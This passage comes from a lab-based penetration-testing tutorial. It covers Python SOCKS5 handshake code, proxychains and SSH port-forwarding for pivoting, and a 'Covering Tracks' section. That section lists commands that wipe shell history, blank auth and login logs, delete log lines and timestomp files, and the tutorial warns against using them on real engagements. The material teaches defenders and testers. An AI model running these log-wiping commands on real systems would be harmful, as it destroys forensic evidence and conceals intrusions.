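    except ValueError:
        name = host.encode("idna")
        if len(name) > 255:
            raise ValueError("hostname too long for SOCKS5")
        # ATYP_DOMAIN: the proxy resolves the name, so the DNS query happens on the far side
        # (this is what proxychains' proxy_dns setting relies on to avoid leaking lookups locally)
        return bytes([ATYP_DOMAIN, len(name)]) + name


def _decode_addr(atyp, body):
    """Return (host, remaining_bytes) for the address that follows an ATYP byte."""
    if atyp == ATYP_IPV4:
        return str(ipaddress.IPv4Address(body[:4])), body[4:]
    if atyp == ATYP_IPV6:
        return str(ipaddress.IPv6Address(body[:16])), body[16:]
    if atyp == ATYP_DOMAIN:
        n = body[0]
        return body[1:1 + n].decode("idna"), body[1 + n:]
    raise ValueError(f"unknown address type {atyp}")


def connect_request(host, port):
    """VER | CMD | RSV | ATYP | DST.ADDR | DST.PORT: the only message proxychains sends per connection."""
    return bytes([VER, CMD_CONNECT, 0x00]) + _encode_addr(host) + struct.pack("!H", port)


def parse_connect_request(data):
    """The proxy side: decode where the client wants the outbound TCP connection opened."""
    ver, cmd, _rsv, atyp = struct.unpack("!BBBB", data[:4])
    if ver != VER or cmd != CMD_CONNECT:
        raise ValueError("only SOCKS5 CONNECT is handled here")
    host, rest = _decode_addr(atyp, data[4:])
    return host, struct.unpack("!H", rest[:2])[0]


def parse_reply(data):
    """VER | REP | RSV | ATYP | BND.ADDR | BND.PORT. Returns (bound_host, bound_port) or raises."""
    ver, rep, _rsv, atyp = struct.unpack("!BBBB", data[:4])
    if ver != VER:
        raise ValueError(f"not SOCKS5 (version byte {ver})")
    if rep != 0:
        raise ConnectionError(REPLIES.get(rep, f"unknown reply code {rep}"))
    host, rest = _decode_addr(atyp, data[4:])
    return host, struct.unpack("!H", rest[:2])[0]


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("proxy closed the connection mid-handshake")
        buf += chunk
    return buf


def socks5_connect(sock, host, port):
    """Run the exchange on a socket already connected to the proxy (e.g. 127.0.0.1:1080).
    On return the same socket is a tunnel to host:port and can be used like a direct one."""
    sock.sendall(client_greeting())
    parse_method_selection(_recv_exact(sock, 2))
    sock.sendall(connect_request(host, port))
    head = _recv_exact(sock, 4)
    if head[3] == ATYP_IPV4:
        body = _recv_exact(sock, 4)
    elif head[3] == ATYP_IPV6:
        body = _recv_exact(sock, 16)
    elif head[3] == ATYP_DOMAIN:
        length = _recv_exact(sock, 1)
        body = length + _recv_exact(sock, length[0])
    else:
        raise ValueError(f"unknown address type {head[3]}")
    return parse_reply(head + body + _recv_exact(sock, 2))
```

Nothing in this exchange carries a raw IP packet, which is why a SYN scan or ICMP ping cannot traverse a SOCKS proxy and nmap must be run with -sT -Pn; every connection costs one extra round trip to the proxy, which is also why scans through a pivot are slow.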
Any TCP client works the same way, SSH included: proxychains ssh user@10.0.0.10 (substitute the account you hold on the internal host). Remember that SOCKS carries only TCP connections: nmap needs -sT -Pn, and ICMP or UDP never traverse the proxy.
SSH Tunneling (Without Metasploit)
```
# Dynamic port forwarding (SOCKS proxy)
ssh -D 1080 user@pivot_host

# Local port forwarding (specific port)
ssh -L 8080:10.0.0.10:80 user@pivot_host
# Now localhost:8080 reaches 10.0.0.10:80

# Remote port forwarding (expose your service to the internal network)
ssh -R 4444:localhost:4444 user@pivot_host
# Internal hosts can reach your port 4444 via pivot_host:4444
# (only if sshd on pivot_host has GatewayPorts enabled; by default -R binds to its loopback only)
```
Part 9: Covering Tracks
Penetration testers document their access but clean up afterwards. Understanding how attackers hide their tracks also helps you detect intrusions.
```
# Clear bash history
history -c
cat /dev/null > ~/.bash_history

# Clear auth logs (requires root)
echo "" > /var/log/auth.log
echo "" > /var/log/wtmp    # wtmp/btmp are binary login records; "emptying" them is itself a loud indicator
echo "" > /var/log/btmp

# Remove specific log entries
sed -i '/YOUR_IP/d' /var/log/auth.log

# Timestomp (change file timestamps)
touch -r /etc/passwd /path/to/your/file

# Meterpreter
meterpreter > clearev                               # Clear Windows event logs
meterpreter > timestomp file -m "01/01/2020 12:00:00"
```
On Real Engagements: Don't Do This
Penetration testers document their access and report their findings. They do not hide them. Wiping logs destroys the evidence defenders need to understand the attack path, and it rarely works anyway: a zero-byte wtmp, a truncated auth.log, or a file whose timestamps exactly match /etc/passwd are themselves loud indicators to a forensic analyst. Practise these techniques only in your isolated lab environment.
Part 4 Checklist
☐ Lab setup: Metasploitable 2 running, isolated network configured
☐ Metasploit: database initialised, basic navigation understood
☐ First exploit: vsftpd backdoor used, root shell obtained
☐ Multiple paths: FTP and SMB exploited, SSH credentials cracked
☐ Post-exploitation: password hashes dumped, system enumerated
☐ Privilege escalation: user to root without a network exploit
☐ Pivoting: autoroute and SOCKS proxy concepts understood
☐ Documentation: every exploit recorded with steps and evidence
What's Next
You have learned to exploit vulnerabilities, escalate privileges, and pivot through networks. You have seen how quickly a single weakness becomes a full compromise. You understand what penetration testers do.
In Part 5 we put it all together. You will run a complete security audit from start to finish:
- Scope and rules of engagement
- A full reconnaissance methodology
- Systematic exploitation
- Thorough post-exploitation
- Professional reporting
- Remediation recommendations
Part 5 is the capstone. Everything you have learned in this series comes together into a real-world methodology you can use to assess the security of any network you are authorised to test.
You have learned the techniques. Now you learn the method. Part 5 turns skills into a complete penetration-testing workflow.
See you in Part 5.